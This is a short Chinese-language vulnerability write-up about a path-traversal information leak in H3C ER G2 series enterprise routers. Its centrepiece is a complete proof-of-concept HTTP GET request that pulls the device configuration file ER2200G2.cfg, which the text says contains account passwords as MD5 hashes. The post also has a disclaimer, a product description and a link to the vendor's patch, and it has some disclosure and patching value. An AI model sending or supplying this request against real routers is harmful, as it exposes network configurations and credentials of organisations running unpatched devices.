H3C ER G2系列路由器敏感信息泄露漏洞

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

一、产品介绍

       H3C ER2200G2是H3C推出的新一代高性能企业级路由器，采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场（SMB），可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。

二、漏洞介绍

       H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口，利用该漏洞访问ER2200G2.cfg文件。

三、影响版本

四、漏洞复现

1.访问漏洞环境

2.Poc

GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
Host: xxxxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: image/avif,image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

请求该地址查看响应结果

此文件中还存在泄漏的账户密码信息。(此处为MD5加密）

五、修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.h3c.com/cn/Products___Technology/Products/Router/Catalog/ER/ER3200/